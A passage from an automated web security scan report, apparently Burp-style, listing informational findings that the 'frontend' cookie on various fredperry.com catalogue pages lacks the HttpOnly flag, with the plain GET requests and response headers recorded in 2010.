Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=21oohvlga4t0df2h7039a5rr11; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.49. http://www.fredperry.com/limited-edition/women/bags/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/bags/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/women/bags/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=gjmo0olg8j8r5ghcuujs3cps30; expires=Tue, 09-Nov-2010 17:11:27 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.50. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/blank-canvas-ann-sofie-back/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/women/blank-canvas-ann-sofie-back/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=kqdflb0gnoias37ltuh5ltdlg1; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Ann-Sof
...[SNIP]...

6.51. http://www.fredperry.com/limited-edition/women/collaboration/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/collaboration/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/women/collaboration/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8ouf9mi5qpo5h66pih8ognai31; expires=Tue, 09-Nov-2010 17:11:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...

6.52. http://www.fredperry.com/limited-edition/women/dresses/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/dresses/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/women/dresses/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=d61hdbqdhv4s27cti0o8g0hir2; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.53. http://www.fredperry.com/limited-edition/women/footwear/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/footwear/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/women/footwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=b17q1ojlmamg9ilg4ttf3oblp4; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.54. http://www.fredperry.com/limited-edition/women/jackets/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jackets/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/women/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8h1ftlraornd04tqj79mkmj4l4; expires=Tue, 09-Nov-2010 17:11:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.55. http://www.fredperry.com/limited-edition/women/jessica-ogden/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jessica-ogden/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/women/jessica-ogden/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=596f22tdrdod98cur9st4it5d2; expires=Tue, 09-Nov-2010 17:11:44 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...

6.56. http://www.fredperry.com/limited-edition/women/knitwear/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/knitwear/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/women/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jbnq5a0ghsbnuogidg8q8buq30; expires=Tue, 09-Nov-2010 17:11:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.57. http://www.fredperry.com/limited-edition/women/new-styles/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/new-styles/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/women/new-styles/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=d6rotfjofe32hk9nc8ps1euar3; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> new-sty
...[SNIP]...

6.58. http://www.fredperry.com/limited-edition/women/shirts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shirts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/women/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:10:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=l8cj4hjmhomdsrq9r9agpunqi5; expires=Tue, 09-Nov-2010 17:10:24 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.59. http://www.fredperry.com/limited-edition/women/shorts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shorts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/women/shorts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1diifrosmkim4fmf8l7gpinjv6; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.60. http://www.fredperry.com/limited-edition/women/skirts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/skirts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/women/skirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hrcu60nic6e0i2909dujlk9531; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.61. http://www.fredperry.com/limited-edition/women/trousers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/trousers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/women/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3q1ler3pe6c91mm157pg5vrt97; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.62. http://www.fredperry.com/limited-edition/women/woven-shirts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/woven-shirts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/women/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9va65seurojgtt61835u38cr71; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.63. http://www.fredperry.com/men/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:55:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=bcdqcqh0hj2cfdtt3hvrpf6se1; expires=Tue, 09-Nov-2010 16:55:17 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men - F
...[SNIP]...

6.64. http://www.fredperry.com/men/jackets/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/jackets/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /men/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:55:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=js68k526o1mh73megv6u2sh8t0; expires=Tue, 09-Nov-2010 16:55:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's J
...[SNIP]...

6.65. http://www.fredperry.com/men/knitwear/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/knitwear/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /men/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:55:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9to2rddhlr3670e25cusgckem5; expires=Tue, 09-Nov-2010 16:55:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Knitwea
...[SNIP]...

6.66. http://www.fredperry.com/men/shirts/

Summary

